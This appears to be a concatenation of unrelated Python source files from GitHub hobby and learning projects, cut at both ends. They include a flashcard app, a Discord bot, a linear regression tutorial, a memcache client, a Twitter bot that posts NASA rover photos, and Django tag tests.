###\n op.drop_table('target_cnt_template')\n # ### end Alembic commands ###\n","repo_name":"beilak/HomeRP_Finance","sub_path":"alembic/versions/9eb38607305e_add_target_template.py","file_name":"9eb38607305e_add_target_template.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}{"seq_id":"73774991584","text":"from tkinter import *\nimport pandas\nimport random\n\nBACKGROUND_COLOR = \"#B1DDC6\"\nto_learn = {}\ncurrent_card = {}\n\ntry:\n data = pandas.read_csv(\"./data/words_to_lear.csv\")\nexcept FileNotFoundError:\n original_data = pandas.read_csv(\"./data/french_words.csv\")\n to_learn = original_data.to_dict(orient=\"records\")\nelse:\n to_learn = data.to_dict(orient=\"records\")\n\ndef next_card():\n global current_card, flip_timer\n\n window.after_cancel(flip_timer)\n\n current_card = random.choice(to_learn)\n canvas.itemconfig(card_image, image=card_front)\n canvas.itemconfig(card_front_label, text=\"French\", fill=\"#000\")\n canvas.itemconfig(card_front_word, text=current_card[\"French\"], fill=\"#000\")\n\n flip_timer = window.after(3000, flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(card_image, image=card_back)\n canvas.itemconfig(card_front_label, text=\"English\", fill=\"#fff\")\n canvas.itemconfig(card_front_word, text=current_card[\"English\"], fill=\"#fff\")\n\n\ndef right_answer():\n to_learn.remove(current_card)\n new_data = pandas.DataFrame(to_learn)\n new_data.to_csv(\"./data/words_to_lear.csv\", index=False)\n\n next_card()\n\n\nwindow = Tk()\nwindow.title(\"Flash Cards\")\nwindow.config(padx=50, pady=50, background=BACKGROUND_COLOR)\n\nflip_timer = window.after(3000, flip_card)\n\n# Card\ncanvas = 
Canvas(width=800, height=526, background=BACKGROUND_COLOR, highlightthickness=0)\ncard_front = PhotoImage(file=\"./images/card_front.png\")\ncard_back = PhotoImage(file=\"./images/card_back.png\")\ncard_image = canvas.create_image(400, 263, image=card_front)\n\ncard_front_label = canvas.create_text(400, 150, text=\"Title\", font=(\"Arial\", 40, \"italic\"), fill=\"#000\")\ncard_front_word = canvas.create_text(400, 253, text=\"word\", font=(\"Arial\", 60, \"bold\"), fill=\"#000\")\n\ncanvas.grid(column=0, row=0, columnspan=2)\n\n# Right\nright_img = PhotoImage(file=\"./images/right.png\")\nbutton_right = Button(image=right_img, highlightbackground=BACKGROUND_COLOR, command=right_answer)\nbutton_right.grid(column=1, row=1)\n\n# Wrong\nwrong_img = PhotoImage(file=\"./images/wrong.png\")\nbutton_wrong = Button(image=wrong_img, highlightbackground=BACKGROUND_COLOR, command=next_card)\nbutton_wrong.grid(column=0, row=1)\n\nnext_card()\n\nwindow.mainloop()\n","repo_name":"mkubincova/100days-of-python","sub_path":"31-flash-cards-capstone/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29759730156","text":"#!/usr/bin/python\n__author__ = 'Pavel Gladkov'\n\nimport sys\n\nres = {}\n\nfor line in sys.stdin:\n line = line.strip()\n\n key, val = line.split('\\t')\n try:\n val = float(val)\n except ValueError:\n continue\n\n try:\n res[key] += val\n except KeyError:\n res[key] = val\n\nfor key in res.keys():\n print('%s\\t%s' % (key, res[key]))","repo_name":"pvgladkov/BigData","sub_path":"streaming_partitioner/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"2878791496","text":"import asyncio\nimport discord\nimport os\nfrom datetime import datetime, timedelta\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\n\n# Pterodactyl requirement\nprint('started')\n\n# general variables\nload_dotenv()\nbot_location = f'{os.path.dirname(os.path.abspath(__file__))}/'\n\n\n# bot setup\nclass Shin(commands.AutoShardedBot):\n # load cogs\n async def setup_hook(self):\n print(f'{current_time()} - Loading cogs')\n for file in os.listdir(f'{bot_location}cogs'):\n if file.endswith('.py'):\n try:\n await bot.load_extension(f'cogs.{file[:-3]}')\n except Exception as e:\n print(f'{current_time()} - Error loading: {file[:-3]} || {e}')\n\n print(f'{current_time()} - Syncing command tree')\n await self.tree.sync()\n\n\nintents = discord.Intents.default()\nintents.message_content = True\nintents.members = True\nbot = Shin(\n command_prefix=os.getenv('prefix'),\n case_insensitive=True,\n help_command=None,\n intents=intents\n)\n\n\n# # functions\n# returns current time\ndef current_time():\n return datetime.now().strftime('%d/%m/%Y %H:%M:%S')\n\n\n# set bot status\nasync def set_status():\n await bot.change_presence(activity=discord.Activity(\n type=discord.ActivityType.watching,\n name='anime!'\n )\n )\n\n\n# # bot events\n# on_ready event\n@bot.event\nasync def on_ready():\n print(f'{current_time()} - {bot.user.name} connected to a shard')\n\n\n# on_member_join event\n@bot.event\nasync def on_member_join(member):\n embeds = bot.get_cog('Embeds')\n await member.add_roles(\n member.guild.get_role(669889906071437332),\n member.guild.get_role(669890055472414736),\n member.guild.get_role(685607372428804104),\n reason='Joined server'\n )\n 
regels_channel = 669161755972206629\n roles_channel = 997578258038132816\n await bot.get_channel(722771390092279819).send(embed=await embeds.join_log(member))\n await bot.get_channel(696859692684541983).send(\n f'Welcome {member.mention}! Please read the <#{regels_channel}> and pick your <#{roles_channel}>, '\n f'a <@&669371769672564776> will be with you as soon as possible! <:KellyHappyMood:720436790913269802>'\n )\n\n\n# on_member_remove event\n@bot.event\nasync def on_member_remove(member):\n embeds = bot.get_cog('Embeds')\n await bot.get_channel(734078899297714216).send(embed=await embeds.leave_log(member))\n\n\n# on_command_error event\n@bot.event\nasync def on_command_error(ctx, error):\n if isinstance(error, commands.MissingAnyRole):\n return await ctx.send(f'Hey {ctx.author.mention} you do not have permission to do that!')\n\n if isinstance(error, commands.MissingPermissions):\n return await ctx.send(f'Hey {ctx.author.mention} you do not have permission to do that!')\n\n if isinstance(error, commands.CommandNotFound):\n return await ctx.send(f'Hey {ctx.author.mention} I do not know that command!')\n\n if isinstance(error, commands.UserNotFound):\n return await ctx.send(f'Hey {ctx.author.mention} I cannot find that user...')\n\n if isinstance(error, commands.MissingRequiredArgument):\n return await ctx.send(\n f'{str(error).split(\" \")[0]} is required! '\n f'Example: `!{ctx.command.name} {str(error).split(\" \")[0]}`'\n )\n\n if isinstance(error, commands.CommandOnCooldown):\n time = str(timedelta(seconds=error.retry_after)).split(':')\n message = await ctx.send(\n f'Hey {ctx.author.mention} You have to wait `{time[0]}` hours `{time[1]}` minutes and `{(time[2])[:2]}` seconds!'\n )\n\n if error.retry_after < 5:\n loop_count = int(error.retry_after)\n else:\n loop_count = 5\n \n for i in range(1, loop_count):\n time = str(timedelta(seconds=error.retry_after - i)).split(':')\n await message.edit(\n content=f'Hey {ctx.author.mention} You have to wait `{time[0]}` hours `{time[1]}` minutes and `{(time[2])[:2]}` seconds!'\n )\n await asyncio.sleep(1)\n return await message.delete()\n\n# check .env\nif not os.path.exists(f'{bot_location}.env'):\n with open(f'{bot_location}.env', 'w') as file:\n file.write('token=BotToken\\nprefix=!\\ndatabase=data.db')\n print(f'{current_time()} - Created .env file')\nelif os.getenv('token') == 'BotToken':\n quit(f'{current_time()} - Please configure the .env file before starting')\n\n\n# print logo\nfor i in range(30):\n print('\\n')\n\nprint(\n \"\"\"\n _____ _ _ \n/ ___| | (_) \n\\ `--.| |__ _ _ __ \n `--. \\ '_ \\| | '_ \\ \n/\\__/ / | | | | | | |\n\\____/|_| |_|_|_| |_|\n \"\"\"\n)\n\n# start bot\nbot.run(token=os.getenv('token'), log_level=0)\n","repo_name":"meesvw/shin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}{"seq_id":"6154977322","text":"import os\n\n# only remove the old database if it actually exists\nif os.path.exists('movies.db'):\n os.remove('movies.db')\n\nfrom datetime import date\nfrom schema import db, Movie\n\ndb.connect()\ndb.create_tables([Movie])\n\nblade_runner = Movie.create(title=\"Blade Runner\",release_date = date(1982,6,25))\nblade_runner.rating = 10\n\nblade_runner.save()\n\nmovies = (\n ( \"Blade Runner 2049\" , 2018 , 9 ) ,\n ( \"2001 : a space odyssey \" , 1968 , 10 ) ,\n ( \"Godzilla vs. 
Hedorah \" , 1968 , 6 ) ,\n ( \"Silent Running \" , 1972 , 8 ) ,\n)\n\nfor movie in movies:\n\n Movie.create(title = movie[0],release_date=date(movie[1],1,1),rating=movie[2])","repo_name":"Muhthoriqas/Learn_ORM_Python","sub_path":"create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34398019059","text":"\"\"\"\nSimple Linear Regression utilizes this linear equation: y = b0 + b1*x1 - where y\nis the dependent variable (what we want to predict), and x1 is the independent\nvariable or feature, b0 is the y-intercept or a constant, and finally b1 is the\nslope coefficient. Regression is when you want to predict a real value.\n\nFor example, predicting the output of potatoes from the amount of fertilizer a\nfarmer chooses to use. The amount of fertilizer is the independent variable or \nthe feature (x1), while the dependent variable is the output of potatoes (y).\nThis would make the equation look like: Potatoes = b0 + b1*Fertilizer for our\nlinear regression model.\n\nOrdinary Least Squares is a technique used to find the best regression line\nthrough simple linear regression models. It works by finding the vertical \ndistance from every data point(yi) to the regression line (ŷi). The difference\nbetween these two (vertical distance between them) is called the residual: \nε1 = yi - ŷi this can be used to find the best regression line. Using the linear\nequation, we want to manipulate b0 and b1 in a way that the the SUM of the \nsquare of the residuals is as small as possible or SUM(yi - ŷi)^2 is smallest.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n\"\"\"\nImporting and reading the dataset with the help of pandas library\n\"\"\"\ndataset = pd.read_csv('Simple-Linear-Regression/Salary_Data.csv')\nX = dataset.iloc[:, :-1].values # Assigning the variable X as the values of all the rows from all the columns except for the last one\nY = dataset.iloc[:, -1].values # Y variable is the dependent variable and it takes values of all rows from the last column\n\n# print(X)\n# print(Y)\n\n\n\"\"\"\nSplitting the dataset into the training set and the test set\n\"\"\"\nfrom sklearn.model_selection import train_test_split # Import the model selection module from sklearn library and use the train_test_split function to split the model into training and testing sets\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, random_state = 0) # Establish the variables for the four different sets. 
Specifying the size of the test set to be 20% while the seed is at 0\n\n\n# print(X_test)\n# print(X_train)\n# print(Y_test)\n# print(Y_train)\n\n\n\"\"\"\nBuilding a simple linear regression model requires importing the correct class.\nSimple linear regression models can be built from scratch or with libraries, in \nthis case we will be using the scikit-learn library to build our model.\n\"\"\"\nfrom sklearn.linear_model import LinearRegression # Use the scikit-learn library to call the LinearRegression class from the linear model module\n\nregressor = LinearRegression() # Assigning variable regressor as an instance object\nregressor.fit(X_train, Y_train) # The fit() method will train the regression model and make calculations based on our training sets for the features (X_train) and our dependent variable (Y_train)\n\n\n\"\"\"\nPredicting the test set results by producing the observations from the test set.\nThe model should be able to accurately predict the salary of the test sets, that\nwe have set aside (there should be 6 of them), based on the years of experience.\nThe ground truth is the actual value of the salaries from our testing sets.\n\"\"\"\nY_pred = regressor.predict(X_test) # Using the predict() method from the LinearRegression class, we can enter the testing set of our features as an argument to create an array of predictions. We will assign this new array to variable Y_pred \n\n\n\"\"\"\nVisualizing the training set results with matplotlib with the pyplot module by \ncreating a 2D plot with x-axis as the years of experience, and the y-axis being \nthe salaries. We are creating this graph for the features training set or X_train.\n\"\"\"\nplt.scatter(X_train, Y_train, color = 'red') # Use the pyplot module, being shown as plt, and use the scatter() module to create a scatter plot. The x-axis is X_train and the y-axis is Y_train. We are also setting the color of the line to be red.\nplt.plot(X_train, regressor.predict(X_train), color = 'blue') # Use the plot method to plot the years of experience from our training set, and then use the predict method to find the predicted salaries for the training set.\n\nplt.title('Salary vs. Experience - Training Set') # Adding the title for the graph\nplt.xlabel('Years of Experience') # Labeling the x-axis\nplt.ylabel('Salary') # Labeling the y-axis\n\n# plt.show() # Displaying the graph\n\n\n\"\"\"\nVisualizing the test set results with matplotlib, similar to what we did earlier.\nWe will use the same labels, and axis except now we will use the X_test and \nY_test as our coordinates. However, the line will remain the same as the one\nfrom the training set, so we won't change anything in plot.\n\"\"\"\nplt.scatter(X_test, Y_test, color = 'red') # The coordinates of the test sets have to be used\nplt.plot(X_train, regressor.predict(X_train), color = 'blue') # We want the same line as our training sets so we will continue to use the same variables to make the same line.\n\nplt.title('Salary vs. Experience - Test Set')\nplt.xlabel('Years of Experience')\nplt.ylabel('Salary')\n\n# plt.show()\n\n\n\"\"\"\nMaking a single prediction with the linear regression model that we have created.\nWe can accomplish this by using the predict() method as shown earlier and passing\na value for our x-axis or feature. 
In our case, the feature is years of \nexperience and so we can input the value 15 (must be inside a 2D array like this\n[[15]] because the predict() method only accepts 2D arrays).\n\"\"\"\nprint(regressor.predict([[15]])) # Instead of giving an entire array to predict the values of, we are just giving one value on the x-axis and the predict() method will find the y-value on the line, or the salary (dependent variable).\n\n\n\"\"\"\nFinding the final linear regression equation is possible by directly getting the\nvalues of the coefficients. We can get the values of the y-intercept (b0) and the\nslope (b1) with the .intercept_ and the .coef_ method.\n\"\"\"\ncoefficient = regressor.coef_ # Gets the coefficient (m) or the slope in the equation: y = mx + b \nintercept = regressor.intercept_ # Gets the y-intercept (b)\n\nprint(f'The equation of the line is: y = {coefficient}x + {intercept}') # Formatted string that displays the final regression line in one final equation!","repo_name":"redayzarra/machine-learning","sub_path":"Simple-Linear-Regression/SL_Regression.py","file_name":"SL_Regression.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23877679166","text":"import asyncio\nimport aiomcache\nimport binascii\nimport functools\nfrom typing import List, Tuple\n\n\ndef server_hash_func(key):\n return (((binascii.crc32(key) & 0xffffffff) >> 16) & 0x7fff) or 1\n\n\ndef pick_and_retry(func):\n @functools.wraps(func)\n async def wrapper(self, key, *args, **kwargs):\n retry = 0\n while True:\n backend, key = self._get_backend(key, retry)\n try:\n data = await func(self, backend, key, *args, **kwargs)\n return data\n except:\n retry += 1\n if retry > Client.MAX_RETRIES:\n raise\n return wrapper\n\n\nclass Client:\n\n MAX_RETRIES = 10\n\n def __init__(self, backends: List[Tuple], *, pool_size=2, pool_minsize=None, loop=None):\n self.loop = loop if loop else asyncio.get_event_loop()\n self.backends = []\n for host, port in backends:\n backend = aiomcache.Client(host, port, pool_size=pool_size, pool_minsize=pool_minsize, loop=loop)\n self.backends.append(backend)\n\n def _get_backend(self, key: str, retry: int = 0):\n if not self.backends:\n return None, None\n\n if isinstance(key, tuple):\n serverhash, key = key\n else:\n serverhash = server_hash_func(key.encode('utf-8'))\n\n if retry:\n serverhash = str(serverhash) + str(retry)\n serverhash = server_hash_func(serverhash.encode('utf-8'))\n\n server = self.backends[serverhash % len(self.backends)]\n return server, key\n\n async def close(self):\n tasks = [backend.close() for backend in self.backends]\n await asyncio.gather(*tasks)\n\n @pick_and_retry\n async def get(self, backend, key: str, default=None):\n return await backend.get(key.encode(), default=default)\n\n @pick_and_retry\n async def set(self, backend, key: str, value: bytes, exptime=0):\n return await backend.set(key.encode(), value, exptime=exptime)\n\n async def multi_get(self, keys: List[str]) -> List[bytes]:\n tasks = [self.get(key) for key in keys]\n return await asyncio.gather(*tasks)\n\n async def delete(self, key):\n tasks = [backend.delete(key.encode()) for backend in self.backends]\n await asyncio.gather(*tasks)\n\n\n__all__ = [Client, 
server_hash_func]\n","repo_name":"viert/aiomcache-multi","sub_path":"aiomcache_multi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70344788385","text":"\"\"\" CONSTANTS AND PARAMETERS FOR QC SCRIPTS: \"\"\"\r\n# output limits:\r\n#min_output=0\r\n#max_output=8.335\r\n# program parameters:\r\nglobal i\r\ni = 0\r\nxe = []\r\nye = []\r\nze = []\r\nxs = []\r\nys = []\r\nzs = []\r\nx_qc = []\r\ny_qc = []\r\nz_qc = []\r\nu = []\r\nv1 = []\r\nv2 = []\r\nv3 = []\r\nv4 = []\r\n#global variables:\r\ncumul=0\r\nlast_e=0\r\npAlphaE=0\r\npBetaE=0\r\npsp2=0\r\npsp1=0\r\nprevEuler=0\r\n\r\ncumulAlpha = 0\r\ncumulBeta = 0\r\n\r\ncumulAlphaPos = 0\r\ncumulBetaPos = 0\r\n\r\ns_r = 0\r\n\r\nparticlesTargetVelocities=[0,0,0,0]\r\n#speed weight:\r\nvParam=-2\r\n#parameters for vertical control\r\nKpv=2\r\nKiv=0\r\nKdv=2\r\n#parameters for horizontal control:\r\nKph=0.4\r\nKih=0.1\r\nKdh=1.5\r\nKph_pos1=0.4\r\nKih_pos1=0.001\r\nKdh_pos1=0.05\r\nKph_pos0=0.4\r\nKih_pos0=0.001\r\nKdh_pos0=0.05\r\n#parameters for rotational control:\r\nKpr=0.05\r\nKir=0\r\nKdr=0.9\r\n\"\"\" =========================================================== \"\"\"\r\n# parameters needed for gradient descent:\r\nt0 = 0\r\ntf = 1\r\ndt = 0.01\r\n\r\nsum_h_alpha = []\r\nsum_h_beta = []\r\nsum_h_pos0 = []\r\nsum_h_pos1 = []\r\n\r\nlast_alpha_angle = 0\r\nlast_alpha_pos = 0\r\nlast_beta_angle = 0\r\nlast_beta_pos = 0\r\n \r\ndelta_alpha_angle = []\r\ndelta_alpha_pos = []\r\ndelta_beta_angle = []\r\ndelta_beta_pos = []\r\n\r\nJ_h_alpha = []\r\nJ_h_beta = []\r\nJ_h_pos0 = []\r\nJ_h_pos1 = []\r\n\r\nparamX = []\r\nparamY = []\r\n\r\ntheta_h_angles = [Kph, Kih, Kdh]\r\ntheta_h_pos = [Kph_pos0, Kih_pos0, Kdh_pos0] # Kph_pos0 == Kph_pos1 ...\r\n\r\ngd = 0","repo_name":"Gochev-Ivan/MAS","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"8124958621","text":"#!usr/bin/python\r\n\r\n\r\nimport os\r\nimport urllib.request\r\nimport time\r\nimport requests\r\nfrom config import getApi\r\n\r\n\r\napi = getApi()\r\nnasaAPI = 'Rn8kSqjsLbjwTQsvb2DFstOBjht4PRkesybxBSKh'\r\n\r\ndef tweetRoverPhotos():\r\n \"\"\"This function makes a request to the NASA API\r\n by changing parameters in the URL. 
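For illustration, with the starting Sol of 1000 used below, the request URL is:\r\n    https://api.nasa.gov/mars-photos/api/v1/rovers/curiosity/photos?sol=1000&camera=mast&api_key=<key>,\r\n    where <key> is the value held in nasaAPI. 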
It loops through every photo taken on that Sol and posts a tweet with each photo included.\"\"\"\r\n\r\n    # The current Sol is kept as a function attribute so progress persists across calls (the original\r\n    # re-created a local marsSol of 1000 on every call, so the Sol never advanced).\r\n    marsSol = getattr(tweetRoverPhotos, 'marsSol', 1000) #A Sol is a measurement for a day on Mars\r\n    req = requests.get(f'https://api.nasa.gov/mars-photos/api/v1/rovers/curiosity/photos?sol={str(marsSol)}&camera=mast&api_key={nasaAPI}')\r\n    dictionary = req.json()\r\n\r\n    if not dictionary['photos']:\r\n        # No photos were taken on this Sol: move straight on to the next one\r\n        marsSol += 1\r\n        print(\"Mars Sol= \" + str(marsSol))\r\n    else:\r\n        for photo in dictionary['photos']:\r\n            imageURL = photo['img_src']\r\n            urllib.request.urlretrieve(imageURL, 'curiosity.jpg')\r\n            status = \"MARTIAN DIRT ALERT: Check out this cool photo from the Curiosity Rover taken using the MAST Camera.\"\r\n            api.PostUpdate(status, media=\"curiosity.jpg\")\r\n            os.remove(\"curiosity.jpg\")\r\n            time.sleep(900) #Post every 15 minutes\r\n        marsSol += 1 # All photos for this Sol have been posted\r\n    tweetRoverPhotos.marsSol = marsSol\r\n\r\nwhile True:\r\n    tweetRoverPhotos()\r\n","repo_name":"BriaWilliams/twitterBot","sub_path":"twiterBot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"24753330716","text":"from collections import deque\n\n\nstack_of_chocolates = [int(x) if x else 0 for x in input().split(', ')]\nqueue_of_milk = deque(int(x) if x else 0 for x in input().split(', '))\nmilkshakes = 0\n\nwhile stack_of_chocolates and queue_of_milk and milkshakes < 5:\n    chocolate = stack_of_chocolates.pop()\n    cup_of_milk = queue_of_milk.popleft()\n\n    if chocolate <= 0 and cup_of_milk <= 0:\n        continue\n\n    if chocolate <= 0:\n        queue_of_milk.appendleft(cup_of_milk)\n        continue\n\n    if cup_of_milk <= 0:\n        stack_of_chocolates.append(chocolate)\n        continue\n\n    if chocolate == cup_of_milk:\n        milkshakes += 1\n    else:\n        stack_of_chocolates.append(chocolate - 5)\n        queue_of_milk.append(cup_of_milk)\n\nif milkshakes == 5:\n    print(\"Great! 
You made all the chocolate milkshakes needed!\")\nelse:\n print(\"Not enough milkshakes.\")\n\nprint(f\"Chocolate: {', '.join(str(x) for x in stack_of_chocolates) if stack_of_chocolates else 'empty'}\")\nprint(f\"Milk: {', '.join(str(x) for x in queue_of_milk) if queue_of_milk else 'empty'}\")\n","repo_name":"kostakazakoff/SoftUni","sub_path":"Python Advanced/stacks_queues_tuples_and_sets/milkshakes.py","file_name":"milkshakes.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"12984510866","text":"\"\"\"Helper function to normalise and denormalise.\"\"\"\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nimport src.topicmodel as tm\n\n\ndef encoders(raw_data):\n # Encoding the labels\n le_txt = preprocessing.LabelEncoder()\n\n # Normalising inputs and outputs\n in_scaler = MinMaxScaler(feature_range=(0, 1))\n out_scaler = MinMaxScaler(feature_range=(0, 1))\n\n return in_scaler, out_scaler, le_txt\n\n\ndef preprocess_training(raw_data, le_txt, in_scaler, out_scaler):\n # Separate inputs from outputs in training dataset\n #raw_data['text'] = le_txt.fit_transform(raw_data['text'])\n \n text_topics = tm.topic_matcher(raw_data['text'])\n raw_data['t0'] = text_topics['t0']\n raw_data['t1'] = text_topics['t1']\n raw_data['t2'] = text_topics['t2']\n raw_data['t3'] = text_topics['t3']\n raw_data['t4'] = text_topics['t4']\n\n inputs = raw_data.drop(['ctd'], axis=1).values\n outputs = raw_data[['ctd']].values\n\n # Scale both the training inputs and outputs\n in_scaled = in_scaler.fit_transform(inputs)\n out_scaled = out_scaler.fit_transform(outputs)\n\n return in_scaled, out_scaled\n\n\ndef preprocess_predict(raw_data, le_txt, in_scaler):\n # Separate inputs from outputs in training dataset\n #raw_data['text'] = le_txt.fit_transform(raw_data['text'])\n\n text_topics = tm.topic_matcher(raw_data['text'])\n raw_data['t0'] = text_topics['t0']\n raw_data['t1'] = text_topics['t1']\n raw_data['t2'] = text_topics['t2']\n raw_data['t3'] = text_topics['t3']\n raw_data['t4'] = text_topics['t4']\n\n inputs = raw_data.values\n\n # Scale both the training inputs and outputs\n in_scaled = in_scaler.fit_transform(inputs)\n\n return in_scaled\n\n\ndef training_test(in_scaled, out_scaled, out_scaler, size):\n in_training, in_test, out_training, out_test = train_test_split(\n in_scaled, out_scaled, test_size=size)\n return in_training, in_test, out_training, out_test\n","repo_name":"HarryGrayDV/OptimusSite","sub_path":"data-science/src/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40958622399","text":"import pandas as pd\n\ndef get_assets():\n ''' Convert the data types of the assets dataset'''\n assets = pd.read_csv('./app/models/cleaned-datasets/cleaned_assets.csv')\n # convert timestamps/datetime\n timestamps = ['last_sale_transaction_timestamp', 'last_sale_event_timestamp', 'last_sale_created_date', 'asset_contract_created_date']\n for timestamp in timestamps:\n assets[timestamp] = pd.to_datetime(assets[timestamp], format = '%Y-%m-%dT%H:%M:%S')\n # Convert categorical string\n assets['asset_category'] = assets['asset_category'].astype('category')\n # Convert numerical strings into numerical datatypes\n assets['last_sale_total_price'] = assets['last_sale_total_price'].astype('float64')\n 
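# (Illustrative note, not from the source data: astype('float64') parses numeric strings, e.g. pd.Series(['1.5', '2']).astype('float64') yields 1.5 and 2.0, while a non-numeric entry would raise a ValueError.)\n    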
assets['asset_favorites'] = assets['asset_favorites'].astype('int64')\n # Adding year created in assets dataframe\n assets['created_year'] = assets['asset_contract_created_date'].dt.year\n # Drop Unnecessary column\n assets.drop('token_id', axis = 'columns', inplace = True)\n # Rename columns \n assets.columns = assets.columns.str.replace(\"_\", \" \")\n assets.columns = assets.columns.str.title()\n return assets\n\ndef get_events():\n '''Convert the data types of the events dataset'''\n events = pd.read_csv('./app/models/cleaned-datasets/cleaned_events.csv')\n # Listing all necessary changes\n timestamps = ['listing_time', 'created_date']\n categories = ['event_type', 'auction_type']\n numerics = ['total_price', 'ending_price', 'starting_price']\n # Convert datetime\n for timestamp in timestamps:\n events[timestamp] = pd.to_datetime(events[timestamp], format = '%Y-%m-%dT%H:%M:%S')\n # Convert categorical data\n events[categories] = events[categories].astype('category')\n # Convert numerical strings\n events[numerics] = events[numerics].astype('float64')\n events.columns = events.columns.str.replace(\"_\", \" \")\n events.columns = events.columns.str.title()\n return events\n\ndef get_collections():\n collections = pd.read_csv(\"./app/models/cleaned-datasets/cleaned_collections.csv\")\n collections['created_date'] = pd.to_datetime(collections['created_date'], format = '%Y-%m-%dT%H:%M:%S')\n collections.columns = collections.columns.str.replace(\"_\", \" \")\n collections.columns = collections.columns.str.title()\n return collections\n\ndef get_listings():\n return pd.read_csv('./app/models/cleaned-datasets/best_listing.csv')","repo_name":"kevinbennetth/GRMDS-NFT-Competition","sub_path":"app/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72873756704","text":"from django.http import Http404\nfrom django.test import TestCase\n\nfrom source.code.models import Code\nfrom source.tags.models import TechnologyTag, ConceptTag\nfrom source.tags.utils import (get_validated_tag_list,\n get_tag_filtered_queryset, filter_queryset_by_tags)\n\n\nclass BaseTestCase(TestCase):\n def assertQuerysetEqual(self, qs1, qs2):\n pk = lambda o: o.pk\n return self.assertEqual(\n list(sorted(qs1, key=pk)),\n list(sorted(qs2, key=pk))\n )\n \nclass TestCodeTagAdd(BaseTestCase):\n code_model = Code\n tech_tag_model = TechnologyTag\n concept_tag_model = ConceptTag\n \n def setUp(self):\n self.tech_tag = self.tech_tag_model.objects.create(name=\"javascript\", slug=\"javascript\")\n self.concept_tag = self.concept_tag_model.objects.create(name=\"mapping\", slug=\"mapping\")\n self.code_one = self.code_model.objects.create(name=\"supermaps\", slug=\"supermaps\")\n self.code_two = self.code_model.objects.create(name=\"justmaps\", slug=\"justmaps\")\n self.code_three = self.code_model.objects.create(name=\"justjs\", slug=\"justjs\")\n \n def test_code_entries(self):\n self.assertEqual(self.code_one.title, \"supermaps\")\n self.assertEqual(self.code_two.title, \"justmaps\")\n self.assertEqual(self.code_three.title, \"justjs\")\n \n def test_add_tags(self):\n # make sure code_one has two empty tagfields\n self.assertEqual(list(self.code_one.technology_tags.all()), [])\n self.assertEqual(list(self.code_one.concept_tags.all()), [])\n # add one tag of each kind\n self.code_one.technology_tags.add(\"javascript\")\n self.code_one.concept_tags.add(\"mapping\")\n # make sure code_one 
has the right tags in each tagfield\n self.assertEqual(list(self.code_one.technology_tags.all()), [self.tech_tag])\n self.assertEqual(list(self.code_one.concept_tags.all()), [self.concept_tag])\n\n # make sure code_two has two empty tagfields\n self.assertEqual(list(self.code_two.technology_tags.all()), [])\n self.assertEqual(list(self.code_two.concept_tags.all()), [])\n # add just one concept tag\n self.code_two.concept_tags.add(\"mapping\")\n # make sure code_two has the right tags in each tagfield\n self.assertEqual(list(self.code_two.technology_tags.all()), [])\n self.assertEqual(list(self.code_two.concept_tags.all()), [self.concept_tag])\n\n # make sure code_three has two empty tagfields\n self.assertEqual(list(self.code_three.technology_tags.all()), [])\n self.assertEqual(list(self.code_three.concept_tags.all()), [])\n # add just one technology tag\n self.code_three.technology_tags.add(\"javascript\")\n # make sure code_three has the right tags in each tagfield\n self.assertEqual(list(self.code_three.technology_tags.all()), [self.tech_tag])\n self.assertEqual(list(self.code_three.concept_tags.all()), [])\n\nclass TestCodeTagQueries(BaseTestCase):\n code_model = Code\n tech_tag_model = TechnologyTag\n concept_tag_model = ConceptTag\n\n def setUp(self):\n self.tech_tag = self.tech_tag_model.objects.create(name=\"javascript\", slug=\"javascript\")\n self.concept_tag = self.concept_tag_model.objects.create(name=\"mapping\", slug=\"mapping\")\n # first code entry gets one tag of each kind\n self.code_one = self.code_model.objects.create(name=\"supermaps\", slug=\"supermaps\")\n self.code_one.technology_tags.add(\"javascript\")\n self.code_one.concept_tags.add(\"mapping\")\n # second code entry gets just one concept tag\n self.code_two = self.code_model.objects.create(name=\"justmaps\", slug=\"justmaps\")\n self.code_two.concept_tags.add(\"mapping\")\n # third code entry gets just one tech tag\n self.code_three = self.code_model.objects.create(name=\"justjs\", slug=\"justjs\")\n self.code_three.technology_tags.add(\"javascript\")\n # this is not ideal, but because of django-taggit internals,\n # we can't filter querysets based on tags unless we compile all\n # technology_tags and concept_tags into a common `tags` list too\n 